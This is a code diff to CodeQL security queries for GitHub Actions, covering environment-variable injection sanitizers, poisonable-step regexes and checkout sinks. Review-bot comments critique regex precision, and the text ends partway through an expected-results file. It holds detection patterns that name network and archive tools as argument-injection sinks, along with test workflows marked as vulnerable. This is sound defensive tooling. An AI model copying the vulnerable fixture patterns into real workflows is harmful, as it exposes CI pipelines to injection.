@@ -9,17 +9,17 @@ import codeql.actions.dataflow.FlowSources abstract class EnvVarInjectionSink extends DataFlow::Node { } +string sanitizerCommand() { + result = + [ + "tr\\s+(-d\\s*)?('|\")?.n('|\")?", // tr -d '\n' ' ', tr '\n' ' ' + "tr\\s+-cd\\s+.*:alpha:", // tr -cd '[:alpha:_]' + "(head|tail)\\s+-n\\s+1" // head -n 1, tail -n 1 + ] +} + /** * Holds if a Run step declares an environment variable with contents from a local file. - * e.g. - * run: | - * cat test-results/.env >> $GITHUB_ENV - * - * echo "sha=$(cat test-results/sha-number)" >> $GITHUB_ENV - * echo "sha=$(> $GITHUB_ENV - * - * FOO=$(cat test-results/sha-number) - * echo "FOO=$FOO" >> $GITHUB_ENV */ class EnvVarInjectionFromFileReadSink extends EnvVarInjectionSink { EnvVarInjectionFromFileReadSink() { @@ -31,11 +31,19 @@ class EnvVarInjectionFromFileReadSink extends EnvVarInjectionSink { this.asExpr() = run.getScript() and step.getAFollowingStep() = run and ( - exists(string cmd | - run.getScript().getACmdReachingGitHubEnvWrite(cmd, _) and - run.getScript().getAFileReadCommand() = cmd + // eg: + // echo "SHA=$(cat test-results/sha-number)" >> $GITHUB_ENV + // echo "SHA=$(> $GITHUB_ENV + // FOO=$(cat test-results/sha-number) + // echo "FOO=$FOO" >> $GITHUB_ENV + exists(string cmd, string var, string sanitizer | + run.getScript().getAFileReadCommand() = cmd and + run.getScript().getACmdReachingGitHubEnvWrite(cmd, var) and + run.getScript().getACmdReachingGitHubEnvWrite(sanitizer, var) and + not exists(sanitizer.regexpFind(sanitizerCommand(), _, _)) ) or + // eg: cat test-results/.env >> $GITHUB_ENV run.getScript().fileToGitHubEnv(_) ) ) 
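Review bot: The patterns in `sanitizerCommand()` are broader than their inline comments describe, and since they are applied with the unanchored `regexpFind`, a command can be treated as newline-stripping when it is not, which suppresses an environment-variable injection alert. `.n` matches any character followed by `n` rather than a literal backslash-n, `tr` has no word boundary so it also matches the tail of a longer command name, and `-n\s+1` also matches `-n 10`. Assuming the script text keeps the backslash, tighter forms would be `"\\btr\\s+(-d\\s*)?('|\")?\\\\n('|\")?"` and `"\\b(head|tail)\\s+-n\\s+1\\b"`. A one-line QLDoc saying that a match means the command's output cannot contain a newline would make the contract explicit.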
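Review bot: In the new `exists(string cmd, string var, string sanitizer | ...)` block the variable `sanitizer` is bound to any command reaching the `GITHUB_ENV` write of `var`, and the condition holds when at least one such command contains no sanitizer pattern, so the name reads as the opposite of what it holds. Renaming it to something like `reaching_cmd` and adding `// flag when some command feeding this variable is not passed through a newline-stripping filter` (if that is the intended rule) would make the quantifier direction explicit. The same `exists ... not exists(... regexpFind(sanitizerCommand(), _, _))` shape is repeated in `EnvVarInjectionFromCommandSink` and `EnvVarInjectionFromEnvVarSink` in the following hunks; a shared private predicate would keep the three checks identical.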
@@ -51,9 +59,18 @@ class EnvVarInjectionFromFileReadSink extends EnvVarInjectionSink { */ class EnvVarInjectionFromCommandSink extends EnvVarInjectionSink { EnvVarInjectionFromCommandSink() { - exists(CommandSource source | + exists(CommandSource source, Run run, string var | this.asExpr() = source.getEnclosingRun().getScript() and - source.getEnclosingRun().getScript().getACmdReachingGitHubEnvWrite(source.getCommand(), _) + run = source.getEnclosingRun() and + run.getScript().getACmdReachingGitHubEnvWrite(source.getCommand(), var) and + ( + not run.getScript().getACmdReachingGitHubEnvWrite(_, var) + or + exists(string sanitizer | + run.getScript().getACmdReachingGitHubEnvWrite(sanitizer, var) and + not exists(sanitizer.regexpFind(sanitizerCommand(), _, _)) + ) + ) ) } } @@ -68,10 +85,18 @@ class EnvVarInjectionFromCommandSink extends EnvVarInjectionSink { */ class EnvVarInjectionFromEnvVarSink extends EnvVarInjectionSink { EnvVarInjectionFromEnvVarSink() { - exists(Run run, string var_name | + exists(Run run, string var_name, string var | exists(run.getInScopeEnvVarExpr(var_name)) and run.getScript() = this.asExpr() and - run.getScript().getAnEnvReachingGitHubEnvWrite(var_name, _) + run.getScript().getAnEnvReachingGitHubEnvWrite(var_name, var) and + ( + not run.getScript().getACmdReachingGitHubEnvWrite(_, var) + or + exists(string sanitizer | + run.getScript().getACmdReachingGitHubEnvWrite(sanitizer, var) and + not exists(sanitizer.regexpFind(sanitizerCommand(), _, _)) + ) + ) ) } } diff --git a/ql/lib/codeql/actions/security/PoisonableSteps.qll b/ql/lib/codeql/actions/security/PoisonableSteps.qll index 85932181aed..0cc8f913166 100644 --- a/ql/lib/codeql/actions/security/PoisonableSteps.qll +++ b/ql/lib/codeql/actions/security/PoisonableSteps.qll 
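Review bot: In `EnvVarInjectionFromEnvVarSink` the sanitizer test is tied to the written variable `var` only, not to the path taken by `var_name`: when every command reaching the write of `var` matches `sanitizerCommand()`, the sink is suppressed even if the environment variable is also placed into the same value directly. A line that combines an unfiltered `$VAR` with an unrelated filtered substitution would, as far as the visible predicates show, produce no alert. Consider treating the write as safe only when the environment variable reaches the sanitised command itself, for example by checking `Bash::envReachingRunExpr` against that command's text, and add a fixture for the mixed case. The helper predicates are defined outside this diff, so this should be confirmed against their semantics.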
@@ -3,22 +3,15 @@ import codeql.actions.config.Config abstract class PoisonableStep extends Step { } -private string dangerousActions() { - exists(string action | - poisonableActionsDataModel(action) and - result = action - ) -} - class DangerousActionUsesStep extends PoisonableStep, UsesStep { - DangerousActionUsesStep() { this.getCallee() = dangerousActions() } + DangerousActionUsesStep() { poisonableActionsDataModel(this.getCallee()) } } class PoisonableCommandStep extends PoisonableStep, Run { PoisonableCommandStep() { exists(string regexp | poisonableCommandsDataModel(regexp) and - this.getScript().getACommand().regexpMatch("^" + regexp + ".*") + this.getScript().getACommand().regexpMatch(regexp) ) } } diff --git a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll index e9bf1edfe7d..c9a78f6d0b6 100644 --- a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll +++ b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll @@ -53,7 +53,7 @@ private module ActionsMutableRefCheckoutConfig implements DataFlow::ConfigSig { predicate isSink(DataFlow::Node sink) { exists(Uses uses | uses.getCallee() = "actions/checkout" and - uses.getArgumentExpr("ref") = sink.asExpr() + uses.getArgumentExpr(["ref", "repository"]) = sink.asExpr() ) } @@ -99,7 +99,7 @@ private module ActionsSHACheckoutConfig implements DataFlow::ConfigSig { predicate isSink(DataFlow::Node sink) { exists(Uses uses | uses.getCallee() = "actions/checkout" and - uses.getArgumentExpr("ref") = sink.asExpr() + uses.getArgumentExpr(["ref", "repository"]) = sink.asExpr() ) } 
@@ -199,7 +199,7 @@ class ActionsMutableRefCheckout extends MutableRefCheckoutStep instanceof UsesSt ( exists(ActionsMutableRefCheckoutFlow::PathNode sink | ActionsMutableRefCheckoutFlow::flowPath(_, sink) and - sink.getNode().asExpr() = this.getArgumentExpr("ref") + sink.getNode().asExpr() = this.getArgumentExpr(["ref", "repository"]) ) or // heuristic base on the step id and field name @@ -243,7 +243,7 @@ class ActionsSHACheckout extends SHACheckoutStep instanceof UsesStep { ( exists(ActionsSHACheckoutFlow::PathNode sink | ActionsSHACheckoutFlow::flowPath(_, sink) and - sink.getNode().asExpr() = this.getArgumentExpr("ref") + sink.getNode().asExpr() = this.getArgumentExpr(["ref", "repository"]) ) or // heuristic base on the step id and field name diff --git a/ql/lib/ext/config/argument_injection_sinks.yml b/ql/lib/ext/config/argument_injection_sinks.yml index 95f81313168..56fced44da8 100644 --- a/ql/lib/ext/config/argument_injection_sinks.yml +++ b/ql/lib/ext/config/argument_injection_sinks.yml @@ -5,12 +5,11 @@ extensions: # https://gtfobins.github.io/ # https://0xn3va.gitbook.io/cheat-sheets/web-application/command-injection/argument-injection data: - - ["(awk)\\s(.*?)", 2, 3] - - ["(curl)\\s(.*?)", 2, 3] - - ["(find)\\s(.*?)", 2, 3] - - ["(git)\\s(.*?)", 2, 3] - - ["(sed)\\s(.*?)", 2, 3] - - ["(tar)\\s(.*?)", 2, 3] - - ["(wget)\\s(.*?)", 2, 3] - - ["(zip)\\s(.*?)", 2, 3] + - ["(awk)\\s(.*?)", 1, 2] + - ["(find)\\s(.*?)", 1, 2] + - ["(git clone)\\s(.*?)", 1, 2] + - ["(sed)\\s(.*?)", 1, 2] + - ["(tar)\\s(.*?)", 1, 2] + - ["(wget)\\s(.*?)", 1, 2] + - ["(zip)\\s(.*?)", 1, 2] diff --git a/ql/lib/ext/config/poisonable_steps.yml b/ql/lib/ext/config/poisonable_steps.yml index aa5148d7cf6..addadd75c87 100644 --- a/ql/lib/ext/config/poisonable_steps.yml +++ b/ql/lib/ext/config/poisonable_steps.yml 
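Review bot: In argument_injection_sinks.yml, narrowing `(git)\\s(.*?)` to `(git clone)\\s(.*?)` and dropping the `curl` row reduces what the argument-injection query can see, with no comment recording why. Other `git` subcommands and `curl` still accept option-like arguments, so if this is a deliberate precision trade-off, a comment above `data:` listing the commands excluded on purpose would stop the rows being mistaken for an oversight. The literal single space inside `git clone` also misses invocations with extra whitespace or a global option between `git` and `clone`; `"(git\\s+clone)\\s(.*?)"` covers the whitespace case without changing the group indices. How the two numeric columns are consumed is not visible in this hunk, so the shift from `2, 3` to `1, 2` should be checked against the predicate that reads them.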
@@ -63,12 +63,12 @@ extensions: extensible: poisonableLocalScriptsDataModel data: # TODO: It could also be in the form of `dir/cmd` - - ["(\\.\\/[a-zA-Z0-9\\-_\\./]+)(.*?)", 2] - - ["(\\.\\s+[a-zA-Z0-9\\-_\\./]+)(.*?)", 2] # eg: . venv/bin/activate - - ["(source|sh|bash|zsh|fish)\\s+(.*?)", 3] - - ["(node)\\s+(.*?)(\\.js|\\.ts)(.*?)", 3] - - ["(python)\\s+(.*?)\\.py(.*?)", 3] - - ["(ruby)\\s+(.*?)\\.rb(.*?)", 3] - - ["(go)\\s+(generate|run)\\s+(.*?)\\.go(.*?)", 4] - - ["(dotnet)\\s+(.*?)\\.csproj(.*?)", 3] + - ["(\\.\\/[^\\s]+)\\b", 1] # eg: ./venv/bin/activate + - ["(\\.\\s+[^\\s]+)\\b", 1] # eg: . venv/bin/activate + - ["(source|sh|bash|zsh|fish)\\s+([^\\s]+)\\b", 2] + - ["(node)\\s+([^\\s]+)(\\.js|\\.ts)\\b", 2] + - ["(python)\\s+([^\\s]+)\\.py\\b", 2] + - ["(ruby)\\s+([^\\s]+)\\.rb\\b", 2] + - ["(go)\\s+(generate|run)\\s+([^\\s]+)\\.go\\b", 3] + - ["(dotnet)\\s+([^\\s]+)\\.csproj\\b", 2] diff --git a/ql/lib/ext/config/untrusted_git_commands.yml b/ql/lib/ext/config/untrusted_git_commands.yml index 0d6c9e3bfa0..b4b96a4af43 100644 --- a/ql/lib/ext/config/untrusted_git_commands.yml +++ b/ql/lib/ext/config/untrusted_git_commands.yml 
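Review bot: The interpreter rows have no leading anchor or word boundary, so `(source|sh|bash|zsh|fish)\\s+([^\\s]+)\\b` can match inside a longer word if the consumer searches unanchored, which the removal of the surrounding `.*` elsewhere in this commit suggests but this hunk does not show. For example, the trailing `sh` of `push` in `git push origin` would match and report `origin` as a local script, adding false positives to the poisonable-step results. Prefixing the rows with a boundary, `"\\b(source|sh|bash|zsh|fish)\\s+([^\\s]+)\\b"` and likewise for `node`, `python`, `ruby`, `go` and `dotnet`, keeps the capture-group numbers unchanged. The captured token is also simply the first word after the interpreter, so `bash -x script.sh` yields `-x`; a comment noting that limitation next to the existing TODO would help.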
@@ -4,29 +4,29 @@ extensions: extensible: untrustedGitCommandsDataModel data: # FILES=$(git diff-tree --no-commit-id --name-only HEAD -r) - - [".*git\\b.*\\bdiff-tree\\b.*", "filename,multiline"] + - ["git\\b.*\\bdiff-tree\\b", "filename,multiline"] # CHANGES=$(git --no-pager diff --name-only $NAME | grep -v -f .droneignore); # CHANGES=$(git diff --name-only) - - [".*git\\b.*\\bdiff\\b.*", "filename,multiline"] + - ["git\\b.*\\bdiff\\b", "filename,multiline"] # COMMIT_MESSAGE=$(git log --format=%s -n 1) - - [".*git\\b.*\\blog\\b.*%s.*", "text,online"] + - ["git\\b.*\\blog\\b.*%s", "text,online"] # COMMIT_MESSAGE=$(git log --format=%B -n 1) - - [".*git\\b.*\\blog\\b.*%B.*", "text,multiline"] + - ["git\\b.*\\blog\\b.*%B", "text,multiline"] # COMMIT_MESSAGE=$(git log --format=oneline) - - [".*git\\b.*\\blog\\b.*oneline.*", "text,oneline"] + - ["git\\b.*\\blog\\b.*oneline", "text,oneline"] # COMMIT_MESSAGE=$(git show -s --format=%B) # COMMIT_MESSAGE=$(git show -s --format=%s) - - [".*git\\b.*\\bshow\\b.*-s.*%s.*", "text,oneline"] - - [".*git\\b.*\\bshow\\b.*-s.*%B.*", "text,multiline"] + - ["git\\b.*\\bshow\\b.*-s.*%s", "text,oneline"] + - ["git\\b.*\\bshow\\b.*-s.*%B", "text,multiline"] # AUTHOR=$(git log -1 --pretty=format:'%an') - - [".*git\\b.*\\blog\\b.*%an.*", "username,oneline"] + - ["git\\b.*\\blog\\b.*%an", "username,oneline"] # AUTHOR=$(git show -s --pretty=%an) - - [".*git\\b.*\\bshow\\b.*%an.*", "username,oneline"] + - ["git\\b.*\\bshow\\b.*%an", "username,oneline"] # EMAIL=$(git log -1 --pretty=format:'%ae') - - [".*git\\b.*\\blog\\b.*%ae.*", "email,oneline"] + - ["git\\b.*\\blog\\b.*%ae", "email,oneline"] # EMAIL=$(git show -s --pretty=%ae) - - [".*git\\b.*\\bshow\\b.*%ae.*", "email,oneline"] + - ["git\\b.*\\bshow\\b.*%ae", "email,oneline"] # BRANCH=$(git branch --show-current) - - [".*git\\b.*\\bbranch\\b.*\\b--show-current\\b.*", "branch,oneline"] + - ["git\\b.*\\bbranch\\b.*\\b--show-current\\b", "branch,oneline"] # BRANCH=$(git rev-parse --abbrev-ref 
HEAD) - - [".*git\\b.*\\brev-parse\\b.*\\b--abbrev-ref\\b.*", "branch,oneline"] + - ["git\\b.*\\brev-parse\\b.*\\b--abbrev-ref\\b", "branch,oneline"] diff --git a/ql/test/library-tests/commands.expected b/ql/test/library-tests/commands.expected index d5536ca1c74..12092de34ef 100644 --- a/ql/test/library-tests/commands.expected +++ b/ql/test/library-tests/commands.expected @@ -92,24 +92,23 @@ | .github/workflows/multiline2.yml:78:9:85:6 | Run Step | tee -a "$GITHUB_ENV" | | .github/workflows/multiline2.yml:85:9:89:35 | Run Step | echo 'JSON_RESPONSE< | | .github/workflows/multiline2.yml:85:9:89:35 | Run Step | tee -a "$GITHUB_ENV" | -| .github/workflows/multiline.yml:11:9:15:6 | Run Step | echo "CHANGELOGEOF" | -| .github/workflows/multiline.yml:11:9:15:6 | Run Step | echo "changelog< event.json | 
@@ -124,33 +123,30 @@ | .github/workflows/multiline.yml:46:9:52:6 | Run Step | ${ISSUE_BODY} | | .github/workflows/multiline.yml:46:9:52:6 | Run Step | EOL | | .github/workflows/multiline.yml:46:9:52:6 | Run Step | FOO | -| .github/workflows/multiline.yml:46:9:52:6 | Run Step | cat << EOL | +| .github/workflows/multiline.yml:46:9:52:6 | Run Step | cat << EOL | | .github/workflows/multiline.yml:52:9:58:6 | Run Step | EOF | | .github/workflows/multiline.yml:52:9:58:6 | Run Step | Hello | | .github/workflows/multiline.yml:52:9:58:6 | Run Step | World | | .github/workflows/multiline.yml:52:9:58:6 | Run Step | cat < | | .github/workflows/multiline.yml:52:9:58:6 | Run Step | sed 's/l/e/g' > file.txt | | .github/workflows/multiline.yml:58:9:63:6 | Run Step | EOF | -| .github/workflows/multiline.yml:58:9:63:6 | Run Step | cat <<-EOF | +| .github/workflows/multiline.yml:58:9:63:6 | Run Step | cat <<-EOF | | .github/workflows/multiline.yml:58:9:63:6 | Run Step | echo "FOO=$TITLE" | | .github/workflows/multiline.yml:63:9:66:6 | Run Step | cat issue.txt | -| .github/workflows/multiline.yml:63:9:66:6 | Run Step | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') | | .github/workflows/multiline.yml:63:9:66:6 | Run Step | grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' | | .github/workflows/multiline.yml:63:9:66:6 | Run Step | sed 's/\\\\r/\\\\n/g' | | .github/workflows/multiline.yml:63:9:66:6 | Run Step | tr -d ' ' | -| .github/workflows/multiline.yml:66:9:71:6 | Run Step | echo "$TITLE" | -| .github/workflows/multiline.yml:66:9:71:6 | Run Step | echo "EOF" | -| .github/workflows/multiline.yml:66:9:71:6 | Run Step | echo "PR_TITLE<> $GITHUB_ENV + - run: | + # VULNERABLE + echo "PR_NUMBER=$(cat pr_number.txt | tr ',' '\n')" >> 
$GITHUB_ENV + - run: | + # NOT VULNERABLE + echo "PR_NUMBER=$(cat pr_number.txt | tr '\n' ' ')" >> $GITHUB_ENV + - run: | + # NOT VULNERABLE + echo "PR_NUMBER=$(cat pr_number.txt | tr -d '\n')" >> $GITHUB_ENV + - run: | + # NOT VULNERABLE + echo "PR_NUMBER=$(cat pr_number.txt | tr -cd '[:alpha:]_')" >> $GITHUB_ENV + - run: | + # NOT VULNERABLE + echo "PR_NUMBER=$(cat pr_number.txt | tail -n 1)" >> $GITHUB_ENV + - run: | + # NOT VULNERABLE + echo "PR_NUMBER=$(cat pr_number.txt | head -n 1)" >> $GITHUB_ENV diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected index 220eaf33663..a79053f2240 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected 
@@ -1,6 +1,4 @@ edges -| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:20:14:24:55 | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | provenance | Config | -| .github/actions/download-artifact/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning91.yml:20:14:24:55 | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | provenance | Config | | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | provenance | Config | | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | Config | | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | Config | 
@@ -29,17 +27,15 @@ edges | .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | provenance | Config | | .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | provenance | Config | | .github/workflows/test12.yml:55:9:61:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | provenance | Config | +| .github/workflows/test16.yml:10:9:15:6 | Uses Step | .github/workflows/test16.yml:15:14:17:63 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test16.yml:10:9:15:6 | Uses Step | .github/workflows/test16.yml:18:14:20:77 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | provenance | Config | nodes -| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | semmle.label | Uses Step | -| .github/actions/download-artifact/action.yaml:6:7:25:4 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | semmle.label | Run Step | | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | semmle.label | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | semmle.label | Run Step | | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | semmle.label | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | semmle.label | Run Step | | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | semmle.label | {\n echo 
'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/artifactpoisoning91.yml:20:14:24:55 | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | semmle.label | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | -| .github/workflows/artifactpoisoning92.yml:20:14:24:55 | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | semmle.label | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | | .github/workflows/test2.yml:12:9:41:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | semmle.label | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | | .github/workflows/test3.yml:13:7:20:4 | Uses Step | semmle.label | Uses Step | 
@@ -92,13 +88,14 @@ nodes | .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | semmle.label | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | | .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | semmle.label | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | | .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | semmle.label | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | +| .github/workflows/test16.yml:10:9:15:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test16.yml:15:14:17:63 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | semmle.label | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | +| .github/workflows/test16.yml:18:14:20:77 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | semmle.label | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | subpaths #select | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. 
| .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. 
| .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/artifactpoisoning91.yml:20:14:24:55 | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | .github/actions/download-artifact/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning91.yml:20:14:24:55 | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning91.yml:20:14:24:55 | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | -| .github/workflows/artifactpoisoning92.yml:20:14:24:55 | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:20:14:24:55 | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | Potential environment variable 
